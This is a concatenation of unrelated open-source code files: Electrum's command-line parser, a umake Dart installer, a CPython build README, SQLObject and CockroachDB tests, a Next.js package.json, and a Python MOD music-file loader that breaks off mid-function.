# Converters applied to raw command-line argument strings, keyed by
# argument name; arguments not listed here stay str.
arg_types = {
    'num': int,
    'nbits': int,
    'imax': int,
    'year': int,
    'from_height': int,
    'to_height': int,
    'tx': tx_from_str,
    'pubkeys': json_loads,
    'jsontx': json_loads,
    'inputs': json_loads,
    'outputs': json_loads,
    'fee': lambda x: str(Decimal(x)) if x is not None else None,
    'amount': lambda x: str(Decimal(x)) if x != '!' else '!',
    'locktime': int,
    'fee_method': str,
    'fee_level': json_loads,
    'encrypt_file': eval_bool,
}
# Per-command configuration variables (set via setconfig/getconfig) that are
# shown in that command's --help as an extra argument group.
config_variables = {
    'addrequest': {
        'requests_dir': 'directory where a bip70 file will be written.',
        'ssl_privkey': 'Path to your SSL private key, needed to sign the request.',
        'ssl_chain': 'Chain of SSL certificates, needed for signed requests. Put your certificate at the top and the root CA at the end',
        'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of bitcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum.org/\')\"',
    },
    'listrequests':{
        'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of bitcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum.org/\')\"',
    }
}
def set_default_subparser(self, name, args=None):
    """see http://stackoverflow.com/questions/5176691/argparse-how-to-specify-a-default-subcommand"""
    subparser_found = False
    for arg in sys.argv[1:]:
        if arg in ['-h', '--help']:  # global help if no subparser
            break
    else:
        # no -h/--help given: scan argparse's private subparser registry
        # (_subparsers._actions / _name_parser_map) for a subcommand name
        # appearing anywhere in argv
        for x in self._subparsers._actions:
            if not isinstance(x, argparse._SubParsersAction):
                continue
            for sp_name in x._name_parser_map.keys():
                if sp_name in sys.argv[1:]:
                    subparser_found = True
        if not subparser_found:
            # insert default in first position, this implies no
            # global options without a sub_parsers specified
            if args is None:
                sys.argv.insert(1, name)
            else:
                args.insert(0, name)
# Monkeypatch: make the helper available on every ArgumentParser instance.
argparse.ArgumentParser.set_default_subparser = set_default_subparser
# workaround https://bugs.python.org/issue23058
# see https://github.com/nickstenning/honcho/pull/121
def subparser_call(self, parser, namespace, values, option_string=None):
    """Replacement for argparse._SubParsersAction.__call__ that propagates
    unrecognized arguments up to the top-level parser via
    parse_known_args instead of erroring out in the subparser."""
    from argparse import ArgumentError, SUPPRESS, _UNRECOGNIZED_ARGS_ATTR
    parser_name = values[0]
    arg_strings = values[1:]
    # set the parser name if requested
    if self.dest is not SUPPRESS:
        setattr(namespace, self.dest, parser_name)
    # select the parser
    try:
        parser = self._name_parser_map[parser_name]
    except KeyError:
        tup = parser_name, ', '.join(self._name_parser_map)
        msg = _('unknown parser {!r} (choices: {})').format(*tup)
        raise ArgumentError(self, msg)
    # parse all the remaining options into the namespace
    # store any unrecognized options on the object, so that the top
    # level parser can decide what to do with them
    namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
    if arg_strings:
        vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
        getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
# Monkeypatch the workaround into argparse.
argparse._SubParsersAction.__call__ = subparser_call
def add_network_options(parser):
    """Attach the network-related CLI flags to the given parser."""
    network_args = [
        (("-1", "--oneserver"),
         dict(action="store_true", dest="oneserver", default=None,
              help="connect to one server only")),
        (("-s", "--server"),
         dict(dest="server", default=None,
              help="set server host:port:protocol, where protocol is either t (tcp) or s (ssl)")),
        (("-p", "--proxy"),
         dict(dest="proxy", default=None,
              help="set proxy [type:]host[:port], where type is socks4,socks5 or http")),
        (("--noonion",),
         dict(action="store_true", dest="noonion", default=None,
              help="do not try to connect to onion servers")),
        (("--skipmerklecheck",),
         dict(action="store_true", dest="skipmerklecheck", default=False,
              help="Tolerate invalid merkle proofs from server")),
    ]
    for flags, kwargs in network_args:
        parser.add_argument(*flags, **kwargs)
def add_global_options(parser):
    """Attach the flags shared by every Electrum sub-command."""
    group = parser.add_argument_group('global options')
    global_args = [
        (("-v",),
         dict(dest="verbosity", help="Set verbosity (log levels)", default='')),
        (("-V",),
         dict(dest="verbosity_shortcuts", help="Set verbosity (shortcut-filter list)", default='')),
        (("-D", "--dir"),
         dict(dest="electrum_path", help="electrum directory")),
        (("-P", "--portable"),
         dict(action="store_true", dest="portable", default=False,
              help="Use local 'electrum_data' directory")),
        (("-w", "--wallet"),
         dict(dest="wallet_path", help="wallet path")),
        (("--testnet",),
         dict(action="store_true", dest="testnet", default=False, help="Use Testnet")),
        (("--regtest",),
         dict(action="store_true", dest="regtest", default=False, help="Use Regtest")),
        (("--simnet",),
         dict(action="store_true", dest="simnet", default=False, help="Use Simnet")),
    ]
    for flags, kwargs in global_args:
        group.add_argument(*flags, **kwargs)
def get_parser():
    """Build the full argparse parser: global options, the 'gui' and
    'daemon' subcommands, plus one subparser per registered command in
    known_commands (with option flags, typed positionals, and per-command
    config variables)."""
    # create main parser
    parser = argparse.ArgumentParser(
        epilog="Run 'electrum help <command>' to see the help for a command")
    add_global_options(parser)
    subparsers = parser.add_subparsers(dest='cmd', metavar='<command>')
    # gui
    parser_gui = subparsers.add_parser('gui', description="Run Electrum's Graphical User Interface.", help="Run GUI (default)")
    parser_gui.add_argument("url", nargs='?', default=None, help="bitcoin URI (or bip70 file)")
    parser_gui.add_argument("-g", "--gui", dest="gui", help="select graphical user interface", choices=['qt', 'kivy', 'text', 'stdio'])
    parser_gui.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
    parser_gui.add_argument("-m", action="store_true", dest="hide_gui", default=False, help="hide GUI on startup")
    parser_gui.add_argument("-L", "--lang", dest="language", default=None, help="default language used in GUI")
    parser_gui.add_argument("--daemon", action="store_true", dest="daemon", default=False, help="keep daemon running after GUI is closed")
    add_network_options(parser_gui)
    add_global_options(parser_gui)
    # daemon
    parser_daemon = subparsers.add_parser('daemon', help="Run Daemon")
    parser_daemon.add_argument("subcommand", choices=['start', 'status', 'stop', 'load_wallet', 'close_wallet'], nargs='?')
    #parser_daemon.set_defaults(func=run_daemon)
    add_network_options(parser_daemon)
    add_global_options(parser_daemon)
    # commands
    for cmdname in sorted(known_commands.keys()):
        cmd = known_commands[cmdname]
        p = subparsers.add_parser(cmdname, help=cmd.help, description=cmd.description)
        add_global_options(p)
        # defaulted arguments become --flags; boolean False defaults become
        # store_true switches, everything else gets a type converter
        for optname, default in zip(cmd.options, cmd.defaults):
            a, help = command_options[optname]
            b = '--' + optname
            action = "store_true" if default is False else 'store'
            args = (a, b) if a else (b,)
            if action == 'store':
                _type = arg_types.get(optname, str)
                p.add_argument(*args, dest=optname, action=action, default=default, help=help, type=_type)
            else:
                p.add_argument(*args, dest=optname, action=action, default=default, help=help)
        # required arguments become typed positionals
        for param in cmd.params:
            h = param_descriptions.get(param, '')
            _type = arg_types.get(param, str)
            p.add_argument(param, help=h, type=_type)
        cvh = config_variables.get(cmdname)
        if cvh:
            group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
            for k, v in cvh.items():
                group.add_argument(k, nargs='?', help=v)
    # 'gui' is the default command
    parser.set_default_subparser('gui')
    return parser
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Dartlang module"""
from contextlib import suppress
from gettext import gettext as _
import logging
import os
import platform
import re
import umake.frameworks.baseinstaller
from umake.interactions import DisplayMessage
from umake.network.download_center import DownloadItem
from umake.tools import add_env_to_user, MainLoop
from umake.ui import UI
logger = logging.getLogger(__name__)
_supported_archs = ['i386', 'amd64']
class DartCategory(umake.frameworks.BaseCategory):
    """umake category grouping the Dart framework installers below."""

    def __init__(self):
        super().__init__(name="Dart", description=_("Dartlang Development Environment"), logo_path=None)
class DartLangEditorRemoval(umake.frameworks.baseinstaller.BaseInstaller):
    """Placeholder for the discontinued Dart Editor.

    ``only_for_removal=True`` keeps the entry around solely so existing
    installations can still be uninstalled; nothing can be installed from it
    (``download_page=None``).
    """

    def __init__(self, category):
        # Fixed typo in the user-visible description: "anyymore" -> "anymore".
        super().__init__(name="Dart Editor", description=_("Dart SDK with editor (not supported upstream anymore)"),
                         download_page=None, category=category, only_on_archs=_supported_archs, only_for_removal=True)
class DartLang(umake.frameworks.baseinstaller.BaseInstaller):
    """Installer for the plain Dart SDK tarball (the category default)."""

    def __init__(self, category):
        super().__init__(name="Dart SDK", description=_("Dart SDK (default)"), is_category_default=True,
                         category=category, only_on_archs=_supported_archs,
                         download_page="https://api.dartlang.org",
                         dir_to_decompress_in_tarball="dart-sdk",
                         required_files_path=[os.path.join("bin", "dart")])

    @MainLoop.in_mainloop_thread
    def get_metadata_and_check_license(self, result):
        """Get latest version and append files to download"""
        logger.debug("Set download metadata")
        error_msg = result[self.download_page].error
        if error_msg:
            logger.error("An error occurred while downloading {}: {}".format(self.download_page, error_msg))
            UI.return_main_screen(status_code=1)
        version = ''
        version_re = r'Dart SDK ([\d\.]+)'
        # Scan the page for the version banner.  When re.search misses, p is
        # None and p.group(1) raises AttributeError, which suppress() swallows
        # so the loop just advances; the for/else branch fires only if no line
        # ever matched (the break was never reached).
        for line in result[self.download_page].buffer:
            p = re.search(version_re, line.decode())
            with suppress(AttributeError):
                version = p.group(1)
                break
        else:
            logger.error("Download page changed its syntax or is not parsable")
            UI.return_main_screen(status_code=1)
        # Map the host architecture to Google's archive naming.
        tag_machine = 'x64'
        if platform.machine() == 'i686':
            tag_machine = 'ia32'
        url = "https://storage.googleapis.com/dart-archive/channels/stable/release/{}/sdk/dartsdk-linux-{}-release.zip"\
              .format(version, tag_machine)
        logger.debug("Found download link for {}".format(url))
        self.download_requests.append(DownloadItem(url, None))
        self.start_download_and_install()

    def post_install(self):
        """Add the Dart SDK bin/ directory to the user's PATH."""
        add_env_to_user(self.name, {"PATH": {"value": os.path.join(self.install_path, "bin")}})
        UI.delayed_display(DisplayMessage(_("You need to restart your current shell session for your {} installation "
                                            "to work properly").format(self.name)))
# pkg-config overrides for RHEL 7 and CentOS 7
RHEL 7 and CentOS 7 do not provide pkg-config `.pc` files for Tcl/Tk. The
OpenSSL 1.1.1 pkg-config file is named `openssl11.pc` and not picked up
by Python's `configure` script.
To build Python with system Tcl/Tk libs and OpenSSL 1.1 package, first
install the developer packages and the `pkgconfig` package with `pkg-config`
command.
```shell
sudo yum install pkgconfig 'tcl-devel >= 8.5.12' 'tk-devel >= 8.5.12' openssl11-devel
```
Then run `configure` with the `PKG_CONFIG_PATH` environment variable pointing at the bundled override files.
```shell
PKG_CONFIG_PATH=Misc/rhel7 ./configure -C
``` | unknown | github | https://github.com/python/cpython | Misc/rhel7/README.md |
from sqlobject import *
from sqlobject.tests.dbtest import *
# Fixture classes exercising how sqlmeta.idName interacts with an explicit
# style: an explicitly set idName (even via an inherited sqlmeta) wins, while
# idName=None makes the style regenerate the name from the class name.
class myid_sqlmeta(sqlmeta):
    # Explicit id column name, inherited by several test classes below.
    idName = "my_id"
class TestSqlmeta1(SQLObject):
    # Inherits idName="my_id" untouched.
    class sqlmeta(myid_sqlmeta):
        pass
class TestSqlmeta2(SQLObject):
    # No explicit idName: the MixedCaseStyle derives "TestSqlmeta2ID".
    class sqlmeta(sqlmeta):
        style = MixedCaseStyle(longID=True)
class TestSqlmeta3(SQLObject):
    # Explicit inherited idName beats the style.
    class sqlmeta(myid_sqlmeta):
        style = MixedCaseStyle(longID=True)
class TestSqlmeta4(SQLObject):
    # Resetting idName=None re-enables style-based name generation.
    class sqlmeta(myid_sqlmeta):
        idName = None
        style = MixedCaseStyle(longID=True)
class longid_sqlmeta(sqlmeta):
    # Both an explicit idName and a long-ID style, for the inheritance cases.
    idName = "my_id"
    style = MixedCaseStyle(longID=True)
class TestSqlmeta5(SQLObject):
    class sqlmeta(longid_sqlmeta):
        pass
class TestSqlmeta6(SQLObject):
    class sqlmeta(longid_sqlmeta):
        idName = None
def test_sqlmeta_inherited_idName():
    """idName is explicit when set (possibly via an inherited sqlmeta) and
    style-generated ("<ClassName>ID") when left as None.

    Only TestSqlmeta1/2 go through setupClass — presumably idName is resolved
    at class-creation time, so the remaining classes need no DB setup
    (TODO confirm against dbtest.setupClass).
    """
    setupClass([TestSqlmeta1, TestSqlmeta2])
    assert TestSqlmeta1.sqlmeta.idName == "my_id"
    assert TestSqlmeta2.sqlmeta.idName == "TestSqlmeta2ID"
    assert TestSqlmeta3.sqlmeta.idName == "my_id"
    assert TestSqlmeta4.sqlmeta.idName == "TestSqlmeta4ID"
    assert TestSqlmeta5.sqlmeta.idName == "my_id"
    assert TestSqlmeta6.sqlmeta.idName == "TestSqlmeta6ID"
{
"private": true,
"scripts": {
"dev": "next",
"build": "next build",
"start": "next start",
"toolbox": "react-toolbox-themr"
},
"dependencies": {
"classnames": "^2.2.5",
"next": "latest",
"react": "^18.2.0",
"react-addons-css-transition-group": "^15.5.2",
"react-dom": "^18.2.0",
"react-toolbox": "^2.0.0-beta.8"
},
"devDependencies": {
"react-toolbox-themr": "^1.0.2"
},
"reactToolbox": {
"include": [
"BUTTON",
"DATE_PICKER"
],
"customProperties": {
"animation-duration": "0.3s",
"color-accent": "var(--palette-pink-a200)",
"color-accent-dark": "var(--palette-pink-700)",
"color-primary-contrast": "var(--color-dark-contrast)",
"color-accent-contrast": "var(--color-dark-contrast)"
},
"output": "public",
"javascript": "./theme.js"
}
} | json | github | https://github.com/vercel/next.js | examples/with-react-toolbox/package.json |
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package sql_test
import (
"context"
gosql "database/sql"
"strings"
"testing"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/kv/kvserver"
"github.com/cockroachdb/cockroach/pkg/multitenant/tenantcapabilitiespb"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/stretchr/testify/require"
)
// TestUnsplitAt exercises ALTER TABLE/INDEX ... UNSPLIT AT and UNSPLIT ALL:
// each case optionally creates splits, runs an unsplit statement, and then
// either matches an expected error substring or verifies that the expected
// number of ranges had their sticky bit cleared.
func TestUnsplitAt(t *testing.T) {
	defer leaktest.AfterTest(t)()
	defer log.Scope(t).Close(t)
	var params base.TestServerArgs
	// TODO(jeffreyxiao): Disable the merge queue due to a race condition. The
	// merge queue might issue an AdminMerge and before the actual merge happens,
	// the LHS of the merge is manually split and is later merged even though a
	// sticky bit has been set on the new RHS. This race condition happens
	// because there is two independent fetches of the RHS during a merge
	// operation (one in the merge queue and another in the actual merge). The
	// merge queue should pass the expected descriptor of the RHS into the
	// AdminMerge request.
	params.Knobs = base.TestingKnobs{
		Store: &kvserver.StoreTestingKnobs{
			DisableMergeQueue: true,
		},
	}
	s, db, _ := serverutils.StartServer(t, params)
	defer s.Stopper().Stop(context.Background())
	// External-process tenants need the split/unsplit capabilities granted
	// explicitly before the ALTER statements are allowed.
	if s.DeploymentMode().IsExternal() {
		require.NoError(t, s.GrantTenantCapabilities(
			context.Background(), serverutils.TestTenantID(),
			map[tenantcapabilitiespb.ID]string{
				tenantcapabilitiespb.CanAdminSplit:   "true",
				tenantcapabilitiespb.CanAdminUnsplit: "true",
			}))
	}
	r := sqlutils.MakeSQLRunner(db)
	r.Exec(t, "CREATE DATABASE d")
	r.Exec(t, `CREATE TABLE d.t (
		i INT,
		s STRING,
		PRIMARY KEY (i, s),
		INDEX s_idx (s)
	)`)
	r.Exec(t, `CREATE TABLE d.i (k INT PRIMARY KEY)`)
	r.Exec(t, `CREATE TABLE i (k INT PRIMARY KEY)`)
	tests := []struct {
		splitStmt   string
		unsplitStmt string
		// Number of unsplits expected.
		count int
		error string
		args  []interface{}
	}{
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (2, 'b')",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (2, 'b')",
			count:       1,
		},
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (3, 'c'), (4, 'd')",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (3, 'c'), (4, 'd')",
			count:       2,
		},
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (5, 'd')",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT SELECT 5, 'd'",
			count:       1,
		},
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (6, 'e'), (7, 'f')",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT SELECT * FROM (VALUES (6, 'e'), (7, 'f')) AS a",
			count:       2,
		},
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (10)",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (10)",
			count:       1,
		},
		{
			splitStmt:   "ALTER TABLE d.i SPLIT AT VALUES (1)",
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ((SELECT 1))",
			count:       1,
		},
		{
			splitStmt:   "ALTER TABLE d.i SPLIT AT VALUES (8)",
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
			args:        []interface{}{8},
			count:       1,
		},
		{
			splitStmt:   "ALTER INDEX d.t@s_idx SPLIT AT VALUES ('f')",
			unsplitStmt: "ALTER INDEX d.t@s_idx UNSPLIT AT VALUES ('f')",
			count:       1,
		},
		{
			splitStmt:   "ALTER TABLE d.t SPLIT AT VALUES (8, 'g'), (9, 'h'), (10, 'i')",
			unsplitStmt: "ALTER TABLE d.t UNSPLIT ALL",
			count:       3,
		},
		{
			splitStmt:   "ALTER INDEX d.t@s_idx SPLIT AT VALUES ('g'), ('h'), ('i')",
			unsplitStmt: "ALTER INDEX d.t@s_idx UNSPLIT ALL",
			count:       3,
		},
		{
			splitStmt:   "ALTER TABLE d.i SPLIT AT VALUES (10), (11), (12)",
			unsplitStmt: "ALTER TABLE d.i UNSPLIT ALL",
			count:       3,
		},
		{
			splitStmt:   "ALTER TABLE i SPLIT AT VALUES (10), (11), (12)",
			unsplitStmt: "ALTER TABLE i UNSPLIT ALL",
			count:       3,
		},
		{
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (1, 'non-existent')",
			error:       "could not UNSPLIT AT (1, 'non-existent')",
		},
		{
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES ('c', 3)",
			error:       "could not parse \"c\" as type int",
		},
		{
			unsplitStmt: "ALTER TABLE d.t UNSPLIT AT VALUES (i, s)",
			error:       `column "i" does not exist`,
		},
		{
			unsplitStmt: "ALTER INDEX d.t@not_present UNSPLIT AT VALUES ('g')",
			error:       `index "not_present" does not exist`,
		},
		{
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES (avg(1::float))",
			error:       "aggregate functions are not allowed in VALUES",
		},
		{
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
			error:       "no value provided for placeholder: $1",
		},
		{
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1)",
			args:        []interface{}{"blah"},
			error:       "error in argument for $1: could not parse \"blah\" as type int: strconv.ParseInt",
		},
		{
			unsplitStmt: "ALTER TABLE d.i UNSPLIT AT VALUES ($1::string)",
			args:        []interface{}{"1"},
			error:       "UNSPLIT AT data column 1 (k) must be of type int, not type string",
		},
	}
	for _, tt := range tests {
		var key roachpb.Key
		var pretty string
		var expirationTimestamp gosql.NullString
		// Create the splits this case unsplits; SPLIT AT returns
		// (key, pretty, expiration) rows that must be drained.
		if tt.splitStmt != "" {
			rows, err := db.Query(tt.splitStmt)
			if err != nil {
				t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
			}
			for rows.Next() {
				if err := rows.Scan(&key, &pretty, &expirationTimestamp); err != nil {
					t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
				}
			}
			if err := rows.Err(); err != nil {
				t.Fatalf("%s: unexpected error setting up test: %s", tt.splitStmt, err)
			}
		}
		rows, err := db.Query(tt.unsplitStmt, tt.args...)
		if err != nil && tt.error == "" {
			t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
		} else if tt.error != "" && err == nil {
			t.Fatalf("%s: expected error: %s", tt.unsplitStmt, tt.error)
		} else if err != nil && tt.error != "" {
			if !strings.Contains(err.Error(), tt.error) {
				t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
			}
		} else {
			actualCount := 0
			for rows.Next() {
				actualCount++
				err := rows.Scan(&key, &pretty)
				if err != nil {
					t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
				}
				// Successful unsplit, verify it happened.
				rng, err := s.LookupRange(key)
				if err != nil {
					t.Fatal(err)
				}
				if !rng.StickyBit.IsEmpty() {
					t.Fatalf("%s: expected range sticky bit to be hlc.MinTimestamp, got %s", tt.unsplitStmt, rng.StickyBit)
				}
			}
			if err := rows.Err(); err != nil {
				t.Fatalf("%s: unexpected error: %s", tt.unsplitStmt, err)
			}
			if tt.count != actualCount {
				t.Fatalf("%s: expected %d unsplits, got %d", tt.unsplitStmt, tt.count, actualCount)
			}
		}
	}
}
import struct
from pymod.constants import *
from pymod.module import *
from pymod.tables import *
from pymod.util import *
# Registry of recognised MOD magic IDs: (magic bytes at file offset 1080,
# human-readable tracker name, channel count).  A file whose magic matches
# none of these is treated as an old 15-sample, 4-channel MOD.
MOD_TYPES = (
    ('M.K.', 'Amiga-NewTracker', 4),
    ('M!K!', 'Amiga-ProTracker', 4),
    ('M&K!', 'Amiga-NoiseTracker', 4),
    ('N.T.', 'Amiga-NoiseTracker?', 4),   # ???, mentioned in libModplug
    ('CD81', '8 Channel Falcon', 8),
    ('OCTA', 'Amiga Oktalyzer', 8),       # SchismTracker/libModplug have
    ('OKTA', 'Amiga Oktalyzer', 8),       # 'C' or 'K', but not both
    ('FLT4', '4 Channel Startrekker', 4),
    ('FLT8', '8 Channel Startrekker', 8),
    ('2CHN', '2 Channel MOD', 2),
    ('3CHN', '3 Channel MOD', 3),         # Does this show up ever?
    ('4CHN', '4 Channel MOD', 4),
    ('5CHN', '5 Channel TakeTracker', 5),
    ('6CHN', '6 Channel MOD', 6),
    ('7CHN', '7 Channel TakeTracker', 7),
    ('8CHN', '8 Channel MOD', 8),
    ('9CHN', '9 Channel TakeTracker', 9),
    ('10CH', '10 Channel MOD', 10),
    ('11CH', '11 Channel TakeTracker', 11),
    ('12CH', '12 Channel MOD', 12),
    ('13CH', '13 Channel TakeTracker', 13),
    ('14CH', '14 Channel MOD', 14),
    ('15CH', '15 Channel TakeTracker', 15),
    ('16CH', '16 Channel MOD', 16),
    ('18CH', '18 Channel MOD', 18),
    ('20CH', '20 Channel MOD', 20),
    ('22CH', '22 Channel MOD', 22),
    ('24CH', '24 Channel MOD', 24),
    ('26CH', '26 Channel MOD', 26),
    ('28CH', '28 Channel MOD', 28),
    ('30CH', '30 Channel MOD', 30),
    ('32CH', '32 Channel MOD', 32),
    ('16CN', '16 Channel MOD', 16),       # Not certain where these two
    ('32CN', '32 Channel MOD', 32),       # come from. (libModplug)
    ('TDZ1', '1 Channel TakeTracker', 1),
    ('TDZ2', '2 Channel TakeTracker', 2),
    ('TDZ3', '3 Channel TakeTracker', 3),
    ('TDZ4', '4 Channel MOD', 4),
    ('TDZ5', '5 Channel MOD', 5),
    ('TDZ6', '6 Channel MOD', 6),
    ('TDZ7', '7 Channel MOD', 7),
    ('TDZ8', '8 Channel MOD', 8),
    ('TDZ9', '9 Channel MOD', 9)
)
class MODNote(Note):
    """A single MOD pattern cell (note, instrument, effect) and its display.

    ``pattdata`` is the raw 4-byte pattern cell; when omitted an empty cell
    is produced.
    """

    def __init__(self, pattdata=None):
        # Fixed: mutable default argument ([]) replaced by None.  The old
        # default was only read, but sharing one list across every empty
        # note was an accident waiting to happen.
        if pattdata:
            # Byte layout: period = low nibble of byte0 + byte1;
            # instrument = high nibble of byte0 + high nibble of byte2;
            # effect = low nibble of byte2; parameter = byte3.
            note = self.mod_period_to_note(((pattdata[0] & 0xf) << 8) + pattdata[1])
            instrument = (pattdata[0] & 0xf0) + (pattdata[2] >> 4)
            voleffect = VOLFX_NONE
            volparam = 0
            effect = pattdata[2] & 0xf
            param = pattdata[3]
            super(MODNote, self).__init__(note, instrument, voleffect, volparam, effect, param)
        else:
            super(MODNote, self).__init__(0, 0, 0, 0, 0, 0)

    def mod_period_to_note(self, period):
        """Map an Amiga period to a 1-based note number (NOTE_NONE if 0/unknown)."""
        if period:
            for num in range(NOTE_LAST + 1):
                # Fixed: 'num / 12' is a float under true division, which
                # makes the shift raise TypeError on Python 3; use floor
                # division (identical result on Python 2).
                if period >= (32 * period_table[num % 12] >> (num // 12 + 2)):
                    return num + 1
        return NOTE_NONE

    def __unicode__(self):
        keys = ['C-', 'C#', 'D-', 'D#', 'E-', 'F-', 'F#', 'G-', 'G#', 'A-', 'A#', 'B-']
        commands = '123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        if self.note == 0: ret1 = '...'
        elif self.note > 0 and self.note <= 120:
            split = divmod(self.note - 1, 12)
            ret1 = '%s%s' % (keys[split[1]], str(split[0]))
        elif self.note == 254: ret1 = '^^^'   # note cut
        elif self.note == 255: ret1 = '==='   # note off
        else: ret1 = '???'  # Fixed: ret1 was unbound for notes 121-253, raising NameError
        if self.instrument: ret2 = str(self.instrument).zfill(2)
        else: ret2 = '..'
        # No volume columns for MOD files
        ret3 = '..'
        if self.effect: letter = commands[self.effect - 1]
        else: letter = '.'
        ret4 = '%s%s' % (letter, hex(self.param)[2:].zfill(2).upper())
        return '%s %s %s %s' % (ret1, ret2, ret3, ret4)

    def __repr__(self):
        return self.__unicode__()
class MODPattern(Pattern):
    """A MOD pattern: a rows-by-channels grid of MODNote cells.

    When ``file`` is given the pattern is read from the stream immediately;
    otherwise a blank grid is created.
    """

    def __init__(self, file=None, rows=64, channels=4):
        super(MODPattern, self).__init__(rows, channels)
        if file:
            self.load(file)
        else:
            self.data = self.empty(self.rows, self.channels)

    def empty(self, rows, channels):
        # A fresh blank MODNote for every cell of the grid.
        return [[MODNote() for _chan in range(channels)] for _row in range(rows)]

    def load(self, file):
        # Cells are stored row-major, 4 big-endian bytes per cell.
        self.data = self.empty(self.rows, self.channels)
        for row_idx in range(self.rows):
            for chan_idx in range(self.channels):
                raw = list(struct.unpack(">4B", file.read(4)))
                self.data[row_idx][chan_idx] = MODNote(raw)
class MODSample(Sample):
    """A MOD instrument sample: 30-byte header plus 8-bit signed PCM data."""

    def __init__(self, file=None):
        super(MODSample, self).__init__()
        # MOD sample data is 8-bit, little-endian, mono, signed PCM.
        self.modsamploadflags = SF_8 | SF_LE | SF_M | SF_PCMS
        if file: self.load(file, 0)

    def load(self, file, loadtype=0):
        """Read either the sample header (loadtype 0) or the PCM data
        (loadtype 1) from the current file position."""
        if loadtype == 0:
            # Loads the MOD sample headers
            modsampname = struct.unpack(">22s", file.read(22))[0]
            modsamplength = struct.unpack(">H", file.read(2))[0]
            modsampfinetune = struct.unpack(">b", file.read(1))[0]
            modsampvolume = struct.unpack(">B", file.read(1))[0]
            modsamploopbegin = struct.unpack(">H", file.read(2))[0]
            modsamplooplength = struct.unpack(">H", file.read(2))[0]
            # Parse it into generic Sample.  Lengths/offsets in the header
            # are in 16-bit words, hence the doubling; volume is scaled from
            # MOD's 0-64 range to 0-256.
            self.name = modsampname
            self.filename = modsampname
            self.volume = MIN(modsampvolume, 64) * 4
            self.length = modsamplength * 2
            self.c5speed = MOD_FINETUNE(modsampfinetune)
            self.loopbegin = modsamploopbegin
            # A loop length <= 2 words conventionally means "no loop".
            if modsamplooplength > 2: self.flags = self.flags | CHN_LOOP
            self.loopend = self.loopbegin + modsamplooplength
        elif loadtype == 1:
            # . . .otherwise, load sample data
            super(MODSample, self).load(file, file.tell(), self.modsamploadflags)
class MOD(Module):
    """A class that holds a generic MOD file.

    Parses the 1084-byte header (title, 31/15 sample headers, order list,
    magic ID), then the pattern grids, then the raw sample data.  All reads
    are big-endian.
    """

    def __init__(self, filename=None):
        super(MOD, self).__init__()
        if not filename:
            # No file: construct an empty default 4-channel module.
            self.id = '4CHN'  # /b/, for teh lulz. . .(bad joke)
            self.tracker = '4 Channel MOD'
            self.restartpos = 0
            self.channelnum = 4
            self.samplenum = 31
        else:
            f = open(filename, 'rb')  # NOTE: MOD files should be big-endian!
            self.filename = filename
            f.seek(1080)  # Magic number is in middle of file.
            magic = struct.unpack(">4s", f.read(4))[0]
            self.id = ''
            for TYPE in MOD_TYPES:
                if magic == TYPE[0]:
                    self.id = magic
                    self.tracker = TYPE[1]
                    self.channelnum = TYPE[2]
                    self.samplenum = 31
                    break
            if self.id == '':
                # Unknown magic: assume the original 15-sample format.
                self.id = '????'
                self.tracker = '*OLD* 4 Channel MOD'
                self.channelnum = 4
                self.samplenum = 15
            f.seek(0)
            self.name = struct.unpack(">20s", f.read(20))[0]  # Song title (padded with NULL)
            self.samples = []
            for num in range(self.samplenum):
                self.samples.append(MODSample(f))  # Loading sample headers
            self.ordernum = struct.unpack(">B", f.read(1))[0]  # Number of orders in song
